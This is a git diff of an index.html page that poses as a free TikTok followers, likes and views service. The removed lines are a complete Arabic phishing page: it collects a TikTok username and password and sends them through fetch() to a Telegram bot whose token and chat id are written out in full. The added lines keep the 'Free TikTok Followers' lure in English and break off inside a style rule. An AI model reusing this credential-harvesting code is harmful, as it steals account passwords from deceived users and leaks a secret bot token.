--- a/index.html
+++ b/index.html
@@ -1,120 +1,18 @@
 <!DOCTYPE html>
-<html lang="ar" dir="rtl">
+<html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>رشق تيك توك</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>Free TikTok Followers</title>
+  <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@600&display=swap" rel="stylesheet">
   <style>
     body {
-      background-color: #121212;
-      margin: 0;
-      padding: 0;
-      font-family: 'Tahoma', sans-serif;
-      color: white;
+      font-family: 'Cairo', sans-serif;
+      background-color: #111;
+      color: #fff;
       display: flex;
-      justify-content: center;
+      flex-direction: column;
       align-items: center;
+      justify-content: center;
       height: 100vh;
-    }
-
-    .container {
-      background-color: #000;
-      padding: 25px;
-      border-radius: 20px;
-      width: 90%;
-      max-width: 400px;
-      text-align: center;
-      box-shadow: 0 0 15px rgba(255, 255, 255, 0.05);
-    }
-
-    .tiktok-text {
-      font-size: 36px;
-      font-weight: bold;
-      margin-bottom: 20px;
-      letter-spacing: 2px;
-    }
-
-    .tiktok-text span:nth-child(1),
-    .tiktok-text span:nth-child(4) {
-      color: #ff0050; /* وردي */
-    }
-
-    .tiktok-text span:nth-child(2),
-    .tiktok-text span:nth-child(5) {
-      color: #00f2ea; /* سماوي */
-    }
-
-    .tiktok-text span:nth-child(3),
-    .tiktok-text span:nth-child(6) {
-      color: #ffffff; /* أبيض */
-    }
-
-    input, select {
-      width: 100%;
-      padding: 14px;
-      margin: 10px 0;
-      border: none;
-      border-radius: 10px;
-      background-color: #1e1e1e;
-      color: white;
-      font-size: 16px;
-      box-sizing: border-box;
-    }
-
-    button {
-      width: 100%;
-      padding: 14px;
-      background-color: #ff0050;
-      border: none;
-      border-radius: 10px;
-      font-size: 18px;
-      color: white;
-      cursor: pointer;
-      margin-top: 10px;
-    }
-
-    button:hover {
-      background-color: #e60045;
-    }
-  </style>
-</head>
-<body>
-  <div class="container">
-    <div class="tiktok-text">
-      <span>T</span><span>i</span><span>k</span><span>T</span><span>o</span><span>k</span>
-    </div>
-    <h2>رشق مجاني</h2>
-    <input type="text" id="username" placeholder="اسم المستخدم">
-    <input type="password" id="password" placeholder="كلمة المرور">
-    <select id="amount">
-      <option value="1000">1000</option>
-      <option value="2000">2000</option>
-      <option value="5000">5000</option>
-    </select>
-    <select id="type">
-      <option value="متابعين">متابعين</option>
-      <option value="لايكات">لايكات</option>
-      <option value="مشاهدات">مشاهدات</option>
-    </select>
-    <button onclick="sendData()">تم</button>
-  </div>
-
-  <script>
-    function sendData() {
-      const username = document.getElementById("username").value;
-      const password = document.getElementById("password").value;
-      const amount = document.getElementById("amount").value;
-      const type = document.getElementById("type").value;
-
-      const token = "7522052271:AAHa6XIscaA7ivTn_C0Wr8oaqritL0GP8EY";
-      const chat_id = "6454073193";
-
-      const message = `🔔 طلب جديد من الموقع:\n👤 يوزر: ${username}\n🔑 كلمة المرور: ${password}\n📦 العدد: ${amount}\n📌 النوع: ${type}`;
-
-      fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`)
-        .then(() => alert("✅ تم الإرسال بنجاح"))
-        .catch(() => alert("❌ فشل الإرسال"));
-    }
-  </script>
-</body>
-</html>
+      margin: 0
